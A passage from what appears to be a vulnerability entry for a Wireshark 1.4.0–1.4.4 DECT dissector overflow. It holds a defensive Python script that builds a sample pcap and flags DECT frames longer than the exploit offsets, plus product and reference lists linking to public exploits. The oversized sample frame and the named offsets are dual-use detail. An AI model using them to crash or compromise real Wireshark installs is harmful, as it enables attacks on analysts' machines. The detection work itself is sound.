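    """Constructed helper: write a little-endian classic pcap around the given frames."""
    out = PCAP_MAGIC_LE + struct.pack("<HHiIII", 2, 4, 0, 0, snaplen, LINKTYPE_ETHERNET)
    for n, frame in enumerate(frames):
        out += struct.pack("<IIII", 0x4dac3226, n, len(frame), len(frame)) + frame
    return out


# Constructed sample: broadcast dst, zero src, ethertype 0x2323; one small DECT frame,
# then one whose 1526-byte payload is far past the 1239/1243-byte exploit offsets.
ETH_HDR_DECT = b"\xff" * 6 + b"\x00" * 6 + struct.pack(">H", DECT_ETHERTYPE)
SAMPLE_PCAP = build_pcap([
    ETH_HDR_DECT + b"\x00" * 64,
    ETH_HDR_DECT + b"A" * 1526,
])

if __name__ == "__main__":
    for idx, n in find_oversized_dect(SAMPLE_PCAP):
        print("frame %d: DECT payload of %d bytes (threshold %d)" % (idx, n, SUSPICIOUS_PAYLOAD_LEN))
```

Run it over a real file with `find_oversized_dect(open(path, "rb").read())`. The length check in `parse_pcap` is deliberate: the capture file itself is attacker-controlled input, so the triage tool must not repeat the dissector's mistake of trusting a length field it read from the file.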

Products Mentioned

Configuration 0

Wireshark >> Wireshark >> Version 1.4.0
Wireshark >> Wireshark >> Version 1.4.1
Wireshark >> Wireshark >> Version 1.4.2
Wireshark >> Wireshark >> Version 1.4.3
Wireshark >> Wireshark >> Version 1.4.4

References

http://www.exploit-db.com/exploits/17185
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.mandriva.com/security/advisories?name=MDVSA-2011:083
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.exploit-db.com/exploits/17195
Tags : exploit, x_refsource_EXPLOIT-DB
http://openwall.com/lists/oss-security/2011/04/18/8
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/44374
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.osvdb.org/71848
Tags : vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/44172
Tags : third-party-advisory, x_refsource_SECUNIA
http://securitytracker.com/id?1025389
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2011/1022
Tags : vdb-entry, x_refsource_VUPEN
http://www.kb.cert.org/vuls/id/243670
Tags : third-party-advisory, x_refsource_CERT-VN
http://openwall.com/lists/oss-security/2011/04/18/2
Tags : mailing-list, x_refsource_MLIST
http://www.vupen.com/english/advisories/2011/1106
Tags : vdb-entry, x_refsource_VUPEN